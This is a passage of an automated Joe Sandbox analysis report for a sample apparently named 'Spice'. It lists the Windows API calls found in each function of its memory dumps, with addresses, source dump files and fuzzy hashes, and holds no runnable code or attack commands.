                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                      • Opcode ID: 06f563278bf8850eeb7c7d08e8b64977de8e57dd23f3f36ef26ae63e1d5522b1
                                                                                                                                                                                                                                      • Instruction ID: de1ea05b3c3cb069f72bbd33124202199dbaaa1f30ba378a865cc02ce8317c95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06f563278bf8850eeb7c7d08e8b64977de8e57dd23f3f36ef26ae63e1d5522b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9312EB1900108AFDB10EFB5DD85DEEB7F9EF54304F10506AE515E7241DB71AE018BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFCB7A
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABCEC,?,?,?,?,?), ref: 00EFCB8F
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFCBDC
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABCEC,?,?,?), ref: 00EFCC16
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                      • Opcode ID: 9b28aa14e7a637f7871543c4dacd00f7441f9aff84af00b89dfae79c70404698
                                                                                                                                                                                                                                      • Instruction ID: 183a309da52e192740acd692d8ccaf4e735a556395eb2257d15040811b6cab18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b28aa14e7a637f7871543c4dacd00f7441f9aff84af00b89dfae79c70404698
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131C13960011CAFCB259F94CC49EFA7BB5FB49320F244499FA09A7261C7315D50EFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __setmode.LIBCMT ref: 00E90BE2
                                                                                                                                                                                                                                        • Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7E51,?,?,00000000), ref: 00E84041
                                                                                                                                                                                                                                        • Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7E51,?,?,00000000,?,?), ref: 00E84065
                                                                                                                                                                                                                                      • _fprintf.LIBCMT ref: 00E90C19
                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00EC694C
                                                                                                                                                                                                                                        • Part of subcall function 00E94CCA: _flsall.LIBCMT ref: 00E94CE3
                                                                                                                                                                                                                                      • __setmode.LIBCMT ref: 00E90C4E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 521402451-0
                                                                                                                                                                                                                                      • Opcode ID: 0d1d8771c22ecd25da04c001064fe0b5066ae29103f65b06ac3d7d74fadcdc31
                                                                                                                                                                                                                                      • Instruction ID: 01090fbc05a3a041c9ef733b7752fe47b7a46026c69c772244ef8699a311281e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d1d8771c22ecd25da04c001064fe0b5066ae29103f65b06ac3d7d74fadcdc31
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E11127B1904208AEDF18B7A4AC42EFEB7ADDF41320F14215AF208762C2DF31585357A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8D3F
                                                                                                                                                                                                                                        • Part of subcall function 00EC8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D49
                                                                                                                                                                                                                                        • Part of subcall function 00EC8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D58
                                                                                                                                                                                                                                        • Part of subcall function 00EC8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D5F
                                                                                                                                                                                                                                        • Part of subcall function 00EC8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D75
                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC92C1
                                                                                                                                                                                                                                      • _memcmp.LIBCMT ref: 00EC92E4
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC931A
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC9321
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1592001646-0
                                                                                                                                                                                                                                      • Opcode ID: 707aab42cbd9b23e4908ac38d1f74c0861f78fd8c3bb99a5f992a928bd250d39
                                                                                                                                                                                                                                      • Instruction ID: 3320f3617e1b354d34e7795640733a87c1d40ceea70c2339753765c1c9ba0594
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 707aab42cbd9b23e4908ac38d1f74c0861f78fd8c3bb99a5f992a928bd250d39
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36216D31D40109EBDB14DF98CA49FEEB7B8EF44305F045059E485BB252D771AA06DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EF63BD
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF63D7
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF63E5
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EF63F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                      • Opcode ID: 9e89ad7062a7c408d0d77643b885f1212beaf23cf1a1e78e164fc099a9538286
                                                                                                                                                                                                                                      • Instruction ID: e8cbd795e711ca3ec6c651148f0ca7a37e392c83f6574624348f940184ca48c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e89ad7062a7c408d0d77643b885f1212beaf23cf1a1e78e164fc099a9538286
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3311E931305518AFD714AB24CC45FBA77E9FF85320F149118FA16E72D2CBA0AD01CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE46F,?,?,?,00ECF262,00000000,000000EF,00000119,?,?), ref: 00ECF867
                                                                                                                                                                                                                                        • Part of subcall function 00ECF858: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF88D
                                                                                                                                                                                                                                        • Part of subcall function 00ECF858: lstrcmpiW.KERNEL32(00000000,?,00ECE46F,?,?,?,00ECF262,00000000,000000EF,00000119,?,?), ref: 00ECF8BE
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE488
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00ECE4AE
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE4E2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                      • Opcode ID: 52ba1c971e6e2ed74c40283aa033728585b921b6c7031dba250994c7fe9541ac
                                                                                                                                                                                                                                      • Instruction ID: 57a4a789cb72b24b23c5aade63e09f8f47f9db6af422a18e9a2cdd2424ba4fe3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52ba1c971e6e2ed74c40283aa033728585b921b6c7031dba250994c7fe9541ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB11003A200345AFDB29AF24DD05E7A77A9FF45310B80502EF816CB2A0EB329942D791
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EA5331
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: __FF_MSGBANNER.LIBCMT ref: 00E95953
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: __NMSG_WRITE.LIBCMT ref: 00E9595A
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                      • Opcode ID: 6e73f375c010b08d13022e94f7bd7e31c06861ecd57c28db836fa2f3e776767e
                                                                                                                                                                                                                                      • Instruction ID: 1c1b4c7ac92991644abdc84f2d02f9894dd03da7a65288f57039ab93547c7376
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e73f375c010b08d13022e94f7bd7e31c06861ecd57c28db836fa2f3e776767e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48113A33505E09AFCF213F70AC0079E37D8AF9A3B0F10242AF818BE1A4CE7099449790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED4385
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED43A6
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED43F8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00ED4401
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1157408455-0
                                                                                                                                                                                                                                      • Opcode ID: 52aa2aebe1a41f6f41a913cef614c1011a2208918b80cfd26e7ee09e8c69a71e
                                                                                                                                                                                                                                      • Instruction ID: 2f8fbcbbc3c5284fbb9c6d32542c098984da0b962150685787822ece0f53b07e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52aa2aebe1a41f6f41a913cef614c1011a2208918b80cfd26e7ee09e8c69a71e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C011E7B190122C7AD7309BA5AC4DFEBBB7CEF44720F10459AF908E72C0D6704E808BA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7E51,?,?,00000000), ref: 00E84041
                                                                                                                                                                                                                                        • Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7E51,?,?,00000000,?,?), ref: 00E84065
                                                                                                                                                                                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00EE6A84
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6A8F
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00EE6ABC
                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00EE6AC7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1504782959-0
                                                                                                                                                                                                                                      • Opcode ID: 4a7b6728720e60e8f3b3d377087511b7202b2540ca7397d36c7fc8a06e86867e
                                                                                                                                                                                                                                      • Instruction ID: 32a04befb9ceaa03a4c09bd8c35ac8e0f4f91ded04c80fa20043788e0789e03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a7b6728720e60e8f3b3d377087511b7202b2540ca7397d36c7fc8a06e86867e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18113A72900109AFCB04FBA4CD46DAEB7F8AF14310B149065F50AB72A2DF31AE14DBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9719
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC972B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9741
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC975C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: eafa5bb57be0cad3ade85785fe8bec07720668e7df3c38d25cabedf40b6ff90e
                                                                                                                                                                                                                                      • Instruction ID: 87cf09887e44789c31ea68dadced874caf05b9e10fc6631bc32a3095e367ace1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eafa5bb57be0cad3ade85785fe8bec07720668e7df3c38d25cabedf40b6ff90e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE114839901218FFEB11DF95C984F9DBBB8FB48710F204096E900B7290DA72AE11DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00E716B4
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EAB93C
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EAB946
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EAB951
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                      • Opcode ID: 44045c9c078e1b4339f19f10b18f5049c20a5b284b10d1b1e19de4773bc6576b
                                                                                                                                                                                                                                      • Instruction ID: 1baf0cd64fbf66598a833a002d1414d7ab4cbdeebd7c3f46a827e70738bcc0ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44045c9c078e1b4339f19f10b18f5049c20a5b284b10d1b1e19de4773bc6576b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65114375A0021DABCB10EF98C885DFE77B9FB04300F148499E905E7141C730BA51DFA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00E72163
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                      • String ID:
